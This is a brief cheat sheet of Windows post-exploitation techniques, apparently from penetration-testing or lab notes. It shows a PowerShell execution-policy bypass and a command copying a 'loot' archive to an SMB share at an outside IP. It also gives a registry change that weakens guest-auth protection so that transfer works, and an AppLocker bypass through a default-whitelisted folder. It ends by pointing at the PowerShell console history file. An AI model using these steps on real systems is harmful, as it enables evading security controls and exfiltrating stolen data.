PowerShell's execution policy
PowerShell's execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts.
Load a powershell shell with execution policy bypassed :
C:\> powershell -ep bypass
To fix the following error, you need to set
AllowInsecureGuestAuth, located in
PS C:\Users\Administrator> copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip copy : You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network. At line:1 char:1 + copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Copy-Item], IOException + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand
You can do it with powershell :
PS C:\Users\Administrator> Set-Itemproperty -path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' -Name 'AllowInsecureGuestAuth' -value 1
AppLocker is configured with default AppLocker rules, we can bypass it by placing our executable in the following directory:
C:\Windows\System32\spool\drivers\color (whitelisted by default).
- ConsoleHost_history :